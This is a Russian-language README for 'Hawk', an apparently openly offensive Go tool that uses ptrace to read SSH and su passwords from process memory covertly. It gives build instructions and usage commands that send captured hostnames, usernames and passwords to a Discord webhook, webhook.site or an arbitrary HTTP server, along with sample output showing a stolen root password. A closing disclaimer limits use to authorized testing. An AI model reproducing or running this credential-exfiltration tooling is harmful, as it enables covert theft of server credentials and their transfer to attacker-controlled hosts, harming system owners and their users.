
Инструмент на Golang, предназначенный для эксфильтрации паролей, обнаруженных через службы sshd и su.
Незаметный перехват учетных данных SSH и SU в реальном времени
Hawk отслеживает процессы sshd и su, извлекая пароли из памяти через ptrace без изменения целевых процессов. Ноль операций записи. Исключительно чтение: сбор учетных данных без изменений.

Hawk использует файловую систему /proc Linux для обнаружения процессов SSH и SU, затем применяет ptrace для подключения и перехвата системных вызовов. Когда происходит аутентификация по паролю, он читает пароль прямо из памяти процесса во время системного вызова write() — полностью незаметно для целевого процесса. Учетные данные передаются через вебхук или выводятся в stdout.
Глубокое погружение: Пост в блоге
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk
Hawk автоматически определяет вебхуки Discord и отправляет форматированные сообщения:
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN
Настройка: Создайте вебхук на вашем Discord-сервере, следуя руководству Discord по вебхукам. Учетные данные появятся в вашем канале с именем хоста, именем пользователя и паролем.
Для других сервисов вебхуков (webhook.site, собственные серверы и т. д.):
# HTTPS (auto-detected)
./hawk https://webhook.site/your-unique-id
# HTTP
./hawk http://192.168.1.100:6969/webhook
# Auto HTTPS if no protocol specified
./hawk webhook.example.com/path
Нет вебхука? Учетные данные выводятся в stdout:
./hawk
Вывод:
hostname=server01 username=root password=SuperSecret123
/proc смонтированаЭтот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам противозаконен. Используйте ответственно и только на тех системах, которыми вы владеете или на тестирование которых имеете явное разрешение.